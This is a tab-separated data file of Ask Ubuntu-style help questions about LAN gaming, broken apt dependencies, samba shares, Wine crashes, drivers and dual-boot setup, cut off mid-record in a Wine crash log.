430066	ubuntu and lan games ( specfically minecraft )	we both have ubuntu 12.04 , same minecraft version , same network as each other via wireless . it says scanning for lan and it never shows up . does ubuntu have a built-in firewall that blocks connections from the local area network , and if so is there anyway to change it ?
430067	how to resolve unmet dependencies and file collisions due mixing diferent repositories ?	apt-get is broken for unresolved dependencies . i follow other answers and i do : sudo apt-get -f install i get reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages were automatically installed and are no longer required : account-plugin-generic-oauth appmenu-qt5 dbconfig-common gnome-control-center-unity hud indicator-bluetooth libaio1 libavcodec53 libavformat53 libavutil51 libbamf3-1 libcdr-0.0-0 libclucene-contribs1 libclucene-core1 libcmis-0.3-3 libcolorhug1 libcolumbus0-0 libcolumbus0-0-common libdbusmenu-qt5 libdc1394-22 libdvdnav4 libdvdread4 libexttextcat-2.0-0 libgexiv2-2 libgsm1 libhaml-ruby1.8 liblangtag-common liblangtag1 libmemcached6 libmspub-0.0-0 libnux-4.0-0 libnux-4.0-common libopencv-core2.4 libopencv-highgui2.4 libopencv-imgproc2.4 libqt5core5 libqt5dbus5 libqt5gui5 libqt5widgets5 libschroedinger-1.0-0 libsqlite0 libswscale2 libtbb2 libva1 libvisio-0.0-0 libxcb-icccm4 libxcb-image0 libxcb-keysyms1 libxcb-randr0 libxcb-render-util0 libxcb-sync0 linux-headers-3.8.0-23 linux-headers-3.8.0-23-generic linux-image-3.8.0-23-generic linux-image-extra-3.8.0-23-generic python-central python-kaa-base python-kaa-metadata python-oneconf python-sqlite python-support python-xlib ruby-haml systemd-shim use 'apt-get autoremove ' to remove them . the following extra packages will be installed : linux-image-extra-3.8.0-35-generic the following new packages will be installed : linux-image-extra-3.8.0-35-generic 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . 3 not fully installed or removed . need to get 30.7 mb of archives . after this operation , 96.1 mb of additional disk space will be used . do you want to continue [ y/n ] ? y get:1 http : //security.ubuntu.com/ubuntu/ raring-security/main linux-image-extra-3.8.0-35-generic i386 3.8.0-35.50 [ 30.7 mb ] fetched 30.7 mb in 44s ( 686 kb/s ) ( reading database ... 395476 files and directories currently installed . ) unpacking linux-image-extra-3.8.0-35-generic ( from ... /linux-image-extra-3.8.0-35-generic_3.8.0-35.50_i386.deb ) ... dpkg : error processing /var/cache/apt/archives/linux-image-extra-3.8.0-35-generic_3.8.0-35.50_i386.deb ( -- unpack ) : trying to overwrite '/lib/modules/3.8.0-35-generic/kernel/arch/x86/platform/iris/iris.ko ' , which is also in package linux-image-3.8.0-35-generic 3.8.0-35.52~precise1 dpkg-deb : error : subprocess paste was killed by signal ( broken pipe ) examining /etc/kernel/postrm.d . run-parts : executing /etc/kernel/postrm.d/initramfs-tools 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic run-parts : executing /etc/kernel/postrm.d/zz-update-grub 3.8.0-35-generic /boot/vmlinuz-3.8.0-35-generic errors were encountered while processing : /var/cache/apt/archives/linux-image-extra-3.8.0-35-generic_3.8.0-35.50_i386.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) relevant info uname -r 3.8.0-35-generic cat /etc/apt/sources.list # deb cdrom : [ ubuntu 12.10 _quantal quetzal_ - release i386 ( 20121017.2 ) ] / quantal main restricted # see http : //help.ubuntu.com/community/upgradenotes for how to upgrade to # newer versions of the distribution . deb http : //us.archive.ubuntu.com/ubuntu/ raring main restricted deb-src http : //us.archive.ubuntu.com/ubuntu/ raring main restricted # # major bug fix updates produced after the final release of the # # distribution . # # n.b . software from this repository is entirely unsupported by the ubuntu # # team . also , please note that software in universe will not receive any # # review or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring universe deb-src http : //us.archive.ubuntu.com/ubuntu/ raring universe # # n.b . software from this repository is entirely unsupported by the ubuntu # # team , and may not be under a free licence . please satisfy yourself as to # # your rights to use the software . also , please note that software in # # multiverse will not receive any review or updates from the ubuntu # # security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring multiverse # # n.b . software from this repository may not have been tested as # # extensively as that contained in the main release , although it includes # # newer versions of some applications which may provide useful features . # # also , please note that software in backports will not receive any review # # or updates from the ubuntu security team . deb http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb-src http : //us.archive.ubuntu.com/ubuntu/ raring-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu raring-security main restricted deb-src http : //security.ubuntu.com/ubuntu raring-security main restricted deb http : //security.ubuntu.com/ubuntu raring-security universe deb-src http : //security.ubuntu.com/ubuntu raring-security universe deb http : //security.ubuntu.com/ubuntu raring-security multiverse deb-src http : //security.ubuntu.com/ubuntu raring-security multiverse # # uncomment the following two lines to add software from canonical's # # 'partner ' repository . # # this software is not part of ubuntu , but is offered by canonical and the # # respective vendors as a service to ubuntu users . # deb http : //archive.canonical.com/ubuntu quantal partner # deb-src http : //archive.canonical.com/ubuntu quantal partner # # this software is not part of ubuntu , but is offered by third-party # # developers who want to ship their latest software . deb http : //extras.ubuntu.com/ubuntu raring main deb-src http : //extras.ubuntu.com/ubuntu raring main cat /etc/apt/sources.list.d/* # deb http : //ppa.launchpad.net/bjori/php5/ubuntu raring main # deb-src http : //ppa.launchpad.net/bjori/php5/ubuntu raring main # deb http : //ppa.launchpad.net/bjori/php5/ubuntu raring main # deb-src http : //ppa.launchpad.net/bjori/php5/ubuntu raring main # deb http : //ppa.launchpad.net/caffeine-developers/ppa/ubuntu raring main # deb-src http : //ppa.launchpad.net/caffeine-developers/ppa/ubuntu raring main deb http : //ppa.launchpad.net/caffeine-developers/ppa/ubuntu raring main # deb-src http : //ppa.launchpad.net/caffeine-developers/ppa/ubuntu raring main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # # # this file is automatically configured # # # # you may comment out this entry , but any other modifications may be lost . deb http : //dl.google.com/linux/chrome/deb/ stable main # needed sources for php5.3 : deb http : //kambing.ui.ac.id/ubuntu/ precise main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ precise main restricted deb http : //kambing.ui.ac.id/ubuntu/ precise-updates main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates main restricted deb http : //kambing.ui.ac.id/ubuntu/ precise universe deb-src http : //kambing.ui.ac.id/ubuntu/ precise universe deb http : //kambing.ui.ac.id/ubuntu/ precise-updates universe deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates universe deb http : //kambing.ui.ac.id/ubuntu/ precise multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise multiverse deb http : //kambing.ui.ac.id/ubuntu/ precise-updates multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ natty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.canonical.com/ubuntu natty partner deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //kambing.ui.ac.id/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise-backports main restricted universe multiverse deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # needed sources for php5.3 : deb http : //kambing.ui.ac.id/ubuntu/ precise main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ precise main restricted deb http : //kambing.ui.ac.id/ubuntu/ precise-updates main restricted deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates main restricted deb http : //kambing.ui.ac.id/ubuntu/ precise universe deb-src http : //kambing.ui.ac.id/ubuntu/ precise universe deb http : //kambing.ui.ac.id/ubuntu/ precise-updates universe deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates universe deb http : //kambing.ui.ac.id/ubuntu/ precise multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise multiverse deb http : //kambing.ui.ac.id/ubuntu/ precise-updates multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise-updates multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ natty-backports main restricted universe multiverse deb http : //security.ubuntu.com/ubuntu precise-security main restricted deb-src http : //security.ubuntu.com/ubuntu precise-security main restricted deb http : //security.ubuntu.com/ubuntu precise-security universe deb-src http : //security.ubuntu.com/ubuntu precise-security universe deb http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //security.ubuntu.com/ubuntu precise-security multiverse deb-src http : //archive.canonical.com/ubuntu natty partner deb http : //extras.ubuntu.com/ubuntu precise main deb-src http : //extras.ubuntu.com/ubuntu precise main deb http : //kambing.ui.ac.id/ubuntu/ precise-backports main restricted universe multiverse deb-src http : //kambing.ui.ac.id/ubuntu/ precise-backports main restricted universe multiverse deb http : //archive.canonical.com/ubuntu precise partner deb-src http : //archive.canonical.com/ubuntu precise partner # deb http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # disabled on upgrade to raring deb http : //ppa.launchpad.net/webupd8team/java/ubuntu quantal main deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu quantal main # deb http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # disabled on upgrade to raring # deb-src http : //ppa.launchpad.net/webupd8team/java/ubuntu raring main # disabled on upgrade to raring # deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main # deb http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main # deb-src http : //ppa.launchpad.net/webupd8team/sublime-text-3/ubuntu raring main sudo dpkg -- configure -a dpkg : dependency problems prevent configuration of linux-image-generic : linux-image-generic depends on linux-image-extra-3.8.0-35-generic ; however : package linux-image-extra-3.8.0-35-generic is not installed . dpkg : error processing linux-image-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic : linux-generic depends on linux-image-generic ( = 3.8.0.35.53 ) ; however : package linux-image-generic is not configured yet . dpkg : error processing linux-generic ( -- configure ) : dependency problems - leaving unconfigured dpkg : dependency problems prevent configuration of linux-generic-pae : linux-generic-pae depends on linux-generic ( = 3.8.0.35.53 ) ; however : package linux-generic is not configured yet . dpkg : error processing linux-generic-pae ( -- configure ) : dependency problems - leaving unconfigured errors were encountered while processing : linux-image-generic linux-generic linux-generic-pae edit : i found that my sources.list have been messed up mainly due to the use of https : //gist.github.com/awm086/6510924 to downgrade a version of php
430069	how to monitor , who is pinging me ?	is there a way to know who is pinging my pc on my network . is it possible to monitor all icmp packets , how can i do that ?
430084	ubuntu server and samba	i am trying to set up a ubuntu server 12.04 nas using samba file sharing . i first tried to set it up with webmin and when that did n't work , i tried to set it up manually using the vi editor modifing the /etc/samba/smb.conf . both times the results were the same . over the network all users can open the share ( empty ) but can not write to the share ( permission denied ) . this is the same for both linux and windows machines . my smb.conf in part looks like : [ john ] writable = yes invalid users = kid1 kid2 kid3 path = /sharedmedia/john comment = john valid users = john wife browsable = yes create mode = 777 directory mode = 777 [ public ] writable = yes path = /sharedmedia/public comment = public valid users = john wife kid1 kid2 kid3 virtualbox browsable = yes create mode = 777 directory mode = 777 ( users on the system include : john , wife , kid1 kid2 kid3 and virtualbox for virtual machine - names hidden for privacy ) all users exist as linux users and samba users and have the same password for both . note : i never did set up samba groups as it did not appear to apply to my use . for example : all users have have their own share on the server but other users should not be allowed to access it . therefore i did not set up groups because there were few shares that all users access . i honestly can not figure out what is holding me back . thanks for your help .
430087	how to stop xubuntu from opening programs when powered on	whenever i shut down xubuntu , if i happen to have any programs open , they start back up when i start up xubuntu . how do i stop it from doing this ? the reason i want to stop it instead of just closing all my programs before shutting down is because i have an apache server running in the background , which is stopping lampp from functioning , and the only way i know how to stop it without lampp is to shut down the computer . but then xubuntu starts it right back up when my computer starts up .
430088	microphone not working 12.04	i have a turtle beach z1 headset . the sound works perfectly only when i use the setting analog input 4.0 , but the microphone wo n't show up on skype or anything i use . when i try to set it using skype , all i get is the options for pulseaudio and i can not change them . when i use pavucontrol , i tried every setting it gave me such as `` video '' `` microphone 1/2 '' `` analog input '' and `` line in '' , and none of them work . from what alsamixer says , i have 2 cards named `` nvidia ck8s '' and `` ivtv-0 '' . i am able to set some settings with the nvidia card , but none of them help me any , and nothing appears in the ivtv-0 . after this i just thought my microphone was dead , so i tried to use my xbox 360 kinect sensor as a webcam , and the same results , the video works perfectly , but no microphone options show up . in pavucontrol i get the options for 2 input devices , `` built-in analog stereo '' , and `` ivtv-0 analog stereo '' . any ideas ?
430092	configure network interface for direct connection	i need to connect two ubuntu machines directly via ethernet ( i.e. , no switch or router between them ) . one of them is running ubuntu desktop , so i am happy to use the network manager for that . the other one is using ubuntu core , so the configuration will need to be done in /etc/network/interfaces . what is the appropriate configuration on each side ?
430103	is there ways to download youtube video ?	youtube is my 3nd favorite web after google and askubuntu , everyday i always watch new video from youtube , but i do not like about youtube is video buffering , so annoying to wait it . now my question is there ways/program to install youtube videos quickly and user friendly ? update i know there 's many ways to download youtube videos using terminal , add-ons and other but any is there anyone here who can explain it in detail and use simple words ?
430104	how can i get subliminal to work and then integrate it with a file manager ?	i have downloaded subliminal which is a program that downloads movie subtitles.but there are several problems : ( 1 ) when i test it at the console with a movie that i know has an english subtitle , i get an unsatisfactory response : alan @ alan-latitude-d530 : ~ $ subliminal -l en la fin du jour.avi usage : subliminal -l language [ language ... ] [ -s ] [ -c cache_file ] [ -p provider [ provider ... ] ] [ -m min_score ] [ -a age ] [ -h ] [ -f ] [ -- addic7ed-username username ] [ -- addic7ed-password password ] [ -q | -v ] [ -- log-file log_file ] [ -- color ] [ -- debug ] [ -- version ] [ -- help ] path [ path ... ] subliminal : error : too few arguments ( 2 ) i loaded a bash script into nautilus so that i could download subtitles by a right-click on a movie file instead of having to go to a console . but i could not get a successful download ! : # ! /bin/bash # name : get_subtitles # author : ( c ) 2014 glutanimate # dependencies : subiminal ( https : //github.com/diaoul/subliminal ) # license : mit license ( http : //opensource.org/licenses/mit ) language= '' en '' while [ $ # -gt 0 ] ; do movie= '' $ 1 '' subliminal `` $ movie '' -l `` $ language '' shift done ( 3 ) finally , in another attempt to download the subtitle with a right-click on the movie file , i opened thunar file management and loaded a command into its custom action : subliminal -f -l en -- % n alas , this did not work either ! my objective here is : ( 1 ) make sure that subliminal actually is working i.e.downloads subtitles ( 2 ) integrate subliminal with a file system so that it operates with a right-click on a movie file without have to work at the terminal
430106	ubuntu fails to complete chroot setup during installation , how do i resolve this ?	i am trying to download ubuntu using crouton but i keep getting the same error message : errors were encountered while processing : /var/cache/apt/archives/smbclient_2 % 3a3.6.3-2ubuntu2.9_amd64.deb e : sub-process /usr/bin/dpkg returned an error code ( 1 ) failed to complete chroot setup unmounting /usr/local/chroots/precise ... can someone please help me fix this ?
430107	specific tools for ubuntu and android	is there a program that basically `` displays '' your android screen fully by connecting it to the laptop ? at one point , moto g came with it 's own mini monitor and you just plug it in and it 'd just display your android on the monitor . is there anything like this for ubuntu 13.10 ?
430113	disconnect idle session	i am on ubuntu 12.04 lts , no gui installed . i want to configure the disconnection of a user ( ssh and terminal ) if their session is idle for 15 minutes . i tried to add the following to /etc/profile : tmout=900 export tmout but it did n't work . i do n't see anything if i run env |grep |tmout .
430115	help with dual-boot partitioning	first off , i want to set up my laptop to dual-boot ubuntu 12.04 and windows 7 . i 've already backed up all the stuff i do n't want to lose . i 've done a clean install of windows 7 and gotten rid of all the bloatware that it pre-installed . i 've got ubuntu on a usb drive and i 've made sure that it will boot from the usb . and i 'm almost ready to go ahead with the install process . but i 'm unsure as to how i should partition things . and before i go any farther , my hdd has 280gb of space , 150gb of it belongs to windows . so i 've got about 130gb for ubuntu to live in . here 's what i know about partitioning so far . i know i need a boot partition , so i do n't end up screwing up the mbr . from what i 've read , the root partition is necessary too . but what about the home partition and swap space ? are they absolutely necessary ? what are all the partitions for ? and last but not least , how big should each partition be ? i do n't need any need any files to be accessible from both os 's . i 'm fine with windows and ubuntu being completely isolated from one another , in fact , i think it 'd be simpler that way since i 'm a new user .
430118	ralink rt2500pci wireless card disabled by hardware switch in ubuntu 13.10 on desktop pc	essentially , i have a ralink rt2500 pci wireless card in my pc . under ubuntu 13.10 , it complains that the hardware switch is disabled , but there is no switch because it is a pci card for a desktop . sudo ifconfig wlan0 up returns : siocsifflags : operation not possible due to rf-kill rfkill list all gives : 0 : phy0 : wireless lan soft blocked : no hard blocked : yes the relevant drivers seem to be installed and working : lsmod | grep rt2 gives : rt2500pci 22682 0 rt2x00pci 13111 1 rt2500pci rt2x00mmio 13395 1 rt2500pci rt2x00lib 48933 3 rt2x00pci , rt2500pci , rt2x00mmio mac80211 517444 2 rt2x00lib , rt2x00pci cfg80211 401762 2 mac80211 , rt2x00lib eeprom_93cx6 13168 1 rt2500pci sudo lshw -c network gives : *-network disabled description : wireless interface product : rt2500 wireless 802.11bg vendor : ralink corp. physical id : 2 bus info : pci @ 0000:01:02.0 logical name : wlan0 version : 01 serial : 00:09 : f3:72:22:8a width : 32 bits clock : 33mhz capabilities : pm bus_master cap_list ethernet physical wireless configuration : broadcast=yes driver=rt2500pci driverversion=3.11.0-17-generic firmware=n/a latency=32 link=no multicast=yes wireless=ieee 802.11bg resources : irq:23 memory : f9efc000-f9efdfff i did n't have this problem under 12.04 lts , but upgraded and am now faced with this . i have tried using the 13.10 live cd , but the exact same message came up . unfortunately , most of the advice i have found relates simply to laptop users being unable to find the hardware switch , or having incorrect bios settings , neither of which apply . hopefully it 's just something simple that i 'm missing , but any help is greatly appreciated . thanks for your time , josh taylor
430119	removed wubi from add/remove programs menu , but i can still boot into it	i installed wubi from a flash drive , then moved it from that into windows ( i assume , i can boot without the flash drive now ) i used add/remove programs to uninstall ubuntu , but i can still boot into it on startup and everything seems to run just fine . as in similar questions that have been asked , i tried bcedit , but the two entries that showed up were both for windows . i 'm planning to install either ubuntu or mint on it 's own partition , but would like to clear out whatever is leftover from wubi first
430120	how do i set ubuntu 12.04.4 up to have buttons for applications , places , and system like older versions of ubuntu	i hate change for change sake . my old ubuntu , no longer supported , had buttons at the top left for applications , places , and system . it was a good system that worked well for me . how can i set up the same thing on ubuntu 12.04.4 .
430122	ca n't update wine	i 'm using wine 1.6.1 and want to upgrade to 1,7,13 but it always every time want update : the following packages have unmet dependencies : wine1.7 : depends : wine1.7-amd64 ( = 1:1.7.13-0ubuntu1~ubuntu13.10.1 ) but it is not going to be installed depends : wine1.7-i386 ( = 1:1.7.13-0ubuntu1~ubuntu13.10.1 ) e : unable to correct problems , you have held broken packages . can anyone help me ? i 'm using ubuntu 13.10 .
430124	virtualbox ubuntu : not enough space left in /tmp to decompress vboxlinuxadditions.run	i have been using ubuntu on my oracle virtual box for a while . recently , i have resize the hdd from 8gb to 16gb because it was full , and for some reasons , guest addition is not working anymore . so i removed the old guest additions , downloading guest additions 4.2.12 , but i can not install it . below is the error message : /media/isos $ sh ./vboxlinuxadditions.run verifying archive integrity ... all good . uncompressing virtualbox 4.2.12 guest additions for linus not enough space left in /tmp ( 1024 kb ) to decompress ./vboxlinuxadditions.run ( 8920 kb ) consider setting tmpdir to a directory with more free space . please help me fix this .
430129	windows 7 hangs up after ubuntu dual-boot installation	i recently installed ubuntu 13.10 using the linux live usb creator to create a live usb and then booting/installing from that drive . everything seemed to go smoothly . i first tested booting ubuntu from grub and everything seems fine with the new installation . my problem is that there are 3 options ( although 2 say recovery partition ) that have `` windows '' associated with them . only one when i select it shows the `` starting windows '' screen where the windows 7 logo would normally appear after an animation . at this point after waiting for extended periods of time , nothing further happens . ( if you need any more information i will update this and provide it . i 'm a beginner with linux but i 'll do my best to help ! )
430130	how to make nvidia geforce 710m a default graphics on ubuntu	honestly , my default graphic driver for ubuntu 13.10 is intel速 ivybridge mobile . but got a nvidia driver which it was already been installed . so , how to make nvidia driver as a default graphics driver ?
430133	is there a way to resize tray icons in cinnamon ?	skype for linux 's icon is about 1.5x the size it should be and as a result is driving me insane . is there a way to resize the tray appearance of just that icon ?
430135	no video in vba-m in wine	so iâve been trying to get vba-m running on ubuntu 13.10 ( saucy salamander ) 32x via wine and it 's almost working . the only problem i 'm having now is a generic sound only ( no video ) output issues . thanks for any and all help with this frustrating problem . p.s it seems like there 'd be documentation on this problem . but all of my searches for anything related have failed .
430137	black screen after installing ubuntu base updates 13.10	i 've looked through a lot of the other `` black screen on reboot '' problems and none of them have seemed to work for me . i 've done too many fresh installs of ubuntu 13.10 onto my hp mini 1000 to try and narrow this down any further . every install , it works fine , i can do anything i want . but after update the ubuntu base under the security updates tab of the software updater application , and then reboot , i get a blank screen . no flashing cursor , no nothing . i have no idea if i have nvidia , as some of the other answers have addressed , but if i look at the packages that the ubuntu base is trying to install , i do n't see nvidia on there anywhere . if i cd .. as far as possible and then `` ls -r | grep nvidia '' i do get a bunch of `` can not open '' in the directories ./ect ./lib and ./proc as well one in ./sys and one in ./usr . i also get some python files and .desktop files with nvidia in the names so i 'm guessing i do have nvidia ? but the ubuntu base does n't have any nvidia packages in its update so it is confusing . i would rather install the updates than not , but if there is no way around it , then i 'm fine avoiding them every time they pop up , i would just like to know what is the route i should take .
430141	viewing thousands of pdf files very rapidly	i have many thousands of pdf files in a directory , and i need to quickly view them one-by-one . i want to be able to open one , look at it , and then quickly ( like with a single keypress ) move on to the next pdf file . geeqie supports this workflow perfectly for images , but it does not appear to support displaying pdf files at this time . is there another file manager , pdf viewer or image viewer that behaves just like geeqie , but that can display pdf files ? i have tried file managers like thunar , konqueror , and dolphin , but they do not offer large enough previews or thumbnails . i have also tried numerous pdf viewers , but they did not support opening multiple pdf files or quickly moving to a new file . can anyone suggest any software for ubuntu that would meet my needs ?
430143	microsoft wireless keyboard natural 7000 becomes unresponsive every 5 seconds or so	i used to use this keyboard with ubuntu 12.04 and it was working with no problems , but on ubuntu 13.10 it frequently becomes unresponsive . is there a fix available for this issue ?
430145	unable to set permission to group for files and folder created from windows 7	i have configured samba share as follows [ pc1 ] comment = drive for pc 1 path = /home/meta/pc1 writeable = yes valid users = meta , pcone guest ok = no read only = no write list = @ pcone browseable = yes create mask = 0775 directory mask = 0775 the user `` meta '' has admin access and while `` pcone '' is a standard user . the problem is that the files and folders created in ubuntu have proper group `` read/write '' permissions but the files/folders created from windows 7 does not have `` write '' permissions for the group . please note that `` meta '' is also a member of `` pcone '' group .
430147	why windows 8 is a lot faster than ubuntu 13.10 on the same laptop ?	i am not a windows fan . i do n't like windows . but , for my curiosity , i temporally installed windows 8 on my machine ( a samsung np300 , intel core i3 , 4gb memory ) . i observed that it 's a lot faster than ubuntu : boot time , application start and so on . why is this happening ? is there any solution to make ubuntu faster ?
430149	need google input tools to type telugu in celtx in ubuntu 13.10	i need google input tools for writing scripts in telugu in celtx . i tried various methods , but none is as simple as google input tools . is there a way ? please tell me .
430153	trying to figure out what the command mean	please explain me what does this command mean : wget -qo- https : //toolbelt.heroku.com/install-ubuntu.sh | sh wget - use wget to download something -qo- first argument is -q , but what does 0- mean ? why does it have dash after it ? | sh - something about pipe , but what exactly ? yes , i read man wget .
430157	installing ubuntu on toshiba satellite with windows 8	all i want to do is install linux ubuntu 12.04 lts as another os on my laptop ( which already has windows 8 ) . i realize this thread might be deemed as a duplicate of this but i do n't care about back-up or lubuntu , nor can i disable uefi because i ca n't get into bios no matter how hard i try . i found out about this option in windows 8 , which for some reason has something to do with recovery : `` change advanced start-up settings '' / '' advanced startup '' . seems like at this point i do not have to deal with bios , uefi , and secure boot , nor do i want to ; this installation process is already complicated enough . ( i 'm writing this because i do n't know if this is relevant to the problem i 'm about to address . ) i boot from the dvd with ubuntu .iso image properly burnt on it . at the start-up i saw a suspicious line : could not open `` \efi\boot\fallback.efi '' : 14 then it moves on to the boot partitions menu without windows 8 on it . now i 'm booting into the trial mode of ubuntu . even during the installation process it does not recognize windows 8 : on this blog the author says that she `` had to manually partition the hard drive , because the ubuntu installer did n't recognize that windows 8 was already on the computer . '' i do n't know if this is safe for an amateur like myself to carry it out , considering that partitioning can not be undone and i do n't know how to do it right : problem/question : how do i get it to recognize windows 8 so that i can partition the memory correctly ? hope i did n't put up too many findings . any help would be appreciated .
430160	bluetooth headphones wo n't connect	i have tried and tried to connect my headphones to my laptop , to no avail . everything else connects with no issues . the laptop finds the headphones , but will not allow me to connect to them . any ideas ?
430161	how to divide libreoffice writer page into 3	very simple question . i want to divide the page into 3 in order to create a brochure . i cant find the ruler option anywhere . version : 4.1.4.2
430163	wine1.6 gaming problems	i am trying to get my steam gaming library working . i have steam installed , and one game dishonored to test the platform . 1 - i installed wine1.6 - > configured it to 32bit via this guide 2 - i installed winetricks . and ran winecfg . 3 - i installed steam windows , ( override `` dwrite '' to fix text ) 4 - installed dishonored . launch dishonored in `` -windowed '' ( as it brings up a black screen on my left most monitor , returns back to my desktop with lowered resolution , and runs in background with sound but no video . 5 - game starts , it loads into the main menu and i get a fatal error popup . program error details are unhandled exception : page fault on read access to 0xbb5104c1 in 32-bit code ( 0xbb5104c1 ) . register dump : cs:0023 ss:002b ds:002b es:002b fs:0063 gs:006b eip : bb5104c1 esp:01b5388c ebp:01b539f8 eflags:00010206 ( r- -- i - -p- ) eax:00455355 ebx:7dadb000 ecx:01b538dc edx:002a0001 esi:0014b678 edi:00000010 stack dump : 0x01b5388c : 7dad4cc8 0014b678 00000010 002a0001 0x01b5389c : 01b538dc 00000000 00000000 00000000 0x01b538ac : 4d430003 00000000 00000000 00000000 0x01b538bc : 00000000 00000000 00000000 002a0001 0x01b538cc : 01b538dc 00000000 01b53918 00000028 0x01b538dc : 00000100 00000000 00000100 00000000 000c : sel=0067 base=00000000 limit=00000000 32-bit -- x backtrace : = > 0 0xbb5104c1 ( 0x01b539f8 ) 1 0x7e7f2e8b in user32 ( +0x62e8a ) ( 0x01b53d78 ) 2 0x7e7f3ca2 peekmessagew+0x61 ( ) in user32 ( 0x01b53dcc ) 3 0x10044b3b in gameoverlayrenderer ( +0x44b3a ) ( 0x01b53de8 ) 4 0x7e7be023 in user32 ( +0x2e022 ) ( 0x01b53e48 ) 5 0x7e7be3bf dialogboxindirectparamaorw+0x4e ( ) in user32 ( 0x01b53e78 ) 6 0x7e7be47d dialogboxindirectparamw+0x4c ( ) in user32 ( 0x01b53eb8 ) 7 0x7e7fa29d messageboxindirectw+0x9c ( ) in user32 ( 0x01b53f18 ) 8 0x7e7fa447 messageboxexw+0x76 ( ) in user32 ( 0x01b53f88 ) 9 0x7e7fa4a5 messageboxw+0x44 ( ) in user32 ( 0x01b53fd8 ) 10 0x0048f0ed in dishonored ( +0x8f0ec ) ( 0x01b5c028 ) 11 0x00491b39 in dishonored ( +0x91b38 ) ( 0x01b5fd48 ) 12 0x00495078 in dishonored ( +0x95077 ) ( 0x01b5fd9c ) 13 0x009e4574 in dishonored ( +0x5e4573 ) ( 0x01b5fdd0 ) 14 0x00ec39a7 in dishonored ( +0xac39a6 ) ( 0x01b5fe60 ) 15 0x7b85e63c call_process_entry+0xb ( ) in kernel32 ( 0x01b5fe78 ) 16 0x7b85f6c3 in kernel32 ( +0x4f6c2 ) ( 0x01b5feb8 ) 17 0x7bc79950 call_thread_func_wrapper+0xb ( ) in ntdll ( 0x01b5fed8 ) 18 0x7bc7c8dd call_thread_func+0x7c ( ) in ntdll ( 0x01b5ffa8 ) 19 0x7bc7992e rtlraiseexception+0x21 ( ) in ntdll ( 0x01b5ffc8 ) 20 0x7bc4e8ee call_dll_entry_point+0x7ed ( ) in ntdll ( 0x01b5ffe8 ) 21 0xf75724ed wine_call_on_stack+0x1c ( ) in libwine.so.1 ( 0x00000000 ) 22 0xf75725ab wine_switch_to_stack+0x2a ( ) in libwine.so.1 ( 0xfffbba88 ) 23 0x7bc541b2 ldrinitializethunk+0x3a1 ( ) in ntdll ( 0xfffbbae8 ) 24 0x7b865c5d __wine_kernel_init+0xa0c ( ) in kernel32 ( 0xfffbcc08 ) 25 0x7bc54773 __wine_process_init+0x192 ( ) in ntdll ( 0xfffbcc98 ) 26 0xf756fc50 wine_init+0x30f ( ) in libwine.so.1 ( 0xfffbccf8 ) 27 0x7bf00fdc main+0xfb ( ) in < wine-loader > ( 0xfffbd148 ) 28 0xf7384905 __libc_start_main+0xf4 ( ) in libc.so.6 ( 0x00000000 ) 0xbb5104c1 : -- no code accessible -- modules : module address debug info name ( 154 modules ) pe 240000- 256000 deferred xinput1_3 pe 400000- 1687000 export dishonored pe a450000- a51c000 deferred steam pe ab80000- ab93000 deferred physxloader pe b1c0000- b1d6000 deferred physxupdateloader pe b2f0000- b386000 deferred physxcooking pe b4a0000- b50d000 deferred cudart32_41_4 pe bc90000- c087000 deferred physxcore pe 10000000-100bb000 export gameoverlayrenderer pe 18000000-1803b000 deferred binkw32 pe 30000000-302c1000 deferred steam2 pe 38000000-38893000 deferred steamclient pe 3b400000-3b41e000 deferred steam_api pe 3f000000-3f0ac000 deferred tier0_s pe 3f600000-3f64b000 deferred vstdlib_s pe 60000000-60021000 deferred cserhelper elf 7b800000-7ba5b000 dwarf kernel32 < elf > \-pe 7b810000-7ba5b000 \ kernel32 elf 7bc00000-7bcdb000 dwarf ntdll < elf > \-pe 7bc10000-7bcdb000 \ ntdll elf 7bf00000-7bf04000 